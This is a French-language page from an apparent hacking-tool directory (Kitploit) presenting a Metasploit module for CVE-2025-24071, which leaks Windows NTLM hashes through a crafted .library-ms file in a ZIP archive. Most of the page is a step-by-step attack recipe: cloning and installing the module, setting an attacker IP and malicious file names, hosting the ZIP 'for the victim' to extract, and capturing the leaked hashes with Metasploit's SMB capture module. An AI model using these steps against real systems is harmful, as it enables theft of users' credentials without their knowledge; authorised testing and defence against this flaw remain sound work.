Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24071-msfvenom — Module Metasploit pour CVE-2025-24071 - Fuite de hash NTLM Windows via .library-ms | Kitploit
Outils/GitHubGitHub/folks-iwd/cve-2025-24071-msfvenom
Frameworks d'ExploitationAttaques de Mots de PasseGénération de PayloadsAnalyse des VulnérabilitésExploitation
GitHubfolks-iwd/cve-2025-24071-msfvenom

CVE-2025-24071-msfvenom

Module Metasploit pour CVE-2025-24071 - Fuite de hash NTLM Windows via .library-ms

Voir le dépôt
255il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24071 : Fuite de hachage NTLM via un fichier .library-ms (Module Metasploit)

Ce dépôt contient un module Metasploit pour exploiter CVE-2025-24071, une vulnérabilité dans l'Explorateur Windows qui fuite les hachages NTLM lorsqu'un fichier .library-ms malveillant est extrait d'une archive ZIP.

Développé par : FOLKS-IWD


Aperçu

La vulnérabilité se produit lorsqu'un utilisateur extrait une archive ZIP contenant un fichier .library-ms spécialement conçu. L'Explorateur Windows initie automatiquement une demande d'authentification SMB vers un serveur distant spécifié dans le fichier, divulguant le hachage NTLM de l'utilisateur sans aucune interaction de sa part.

Ce module Metasploit :

  1. Génère un fichier .library-ms malveillant.
  2. L'empaquette dans une archive ZIP.
  3. S'intègre à la fonctionnalité de capture SMB de Metasploit pour collecter les hachages NTLM. image

Installation
  1. Clonez le dépôt :
    root@kitploit:~
    git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
    cd CVE-2025-24071-msfvenom
    
  2. Copiez le module dans votre répertoire des modules Metasploit :
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    

Utilisation

  1. Chargez le module :
    root@kitploit:~
    use auxiliary/server/ntlm_hash_leak
    
  2. Définissez les options requises :
    root@kitploit:~
    set ATTACKER_IP 192.168.1.162  # Replace with your IP address
    set FILENAME exploit.zip       # Name of the malicious ZIP file
    set LIBRARY_NAME malicious.library-ms  # Name of the .library-ms file
    set SHARE_NAME shared          # SMB share name
    
  3. Exécutez le module :
    root@kitploit:~
    run
    
  4. Le module générera un fichier ZIP malveillant (exploit.zip). Hébergez ce fichier pour que la victime le télécharge et l'extraie.
  5. Utilisez le module de capture SMB de Metasploit pour collecter les hachages NTLM :
    root@kitploit:~
    use auxiliary/server/capture/smb
    set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
    run
    
Télécharger l’outil